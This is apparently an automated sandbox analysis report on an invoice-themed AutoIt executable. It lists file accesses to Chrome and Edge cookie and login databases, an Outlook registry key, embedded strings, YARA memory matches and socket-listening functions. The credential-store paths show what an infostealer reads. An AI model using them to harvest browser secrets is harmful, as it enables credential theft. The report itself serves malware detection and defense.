Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: Revised Invoice H000127896.exe Binary or memory string: WIN_XP
Source: Revised Invoice H000127896.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: Revised Invoice H000127896.exe Binary or memory string: WIN_XPe
Source: Revised Invoice H000127896.exe Binary or memory string: WIN_VISTA
Source: Revised Invoice H000127896.exe Binary or memory string: WIN_7
Source: Revised Invoice H000127896.exe Binary or memory string: WIN_8

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_004652BE
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00476619
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0046CEF3
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs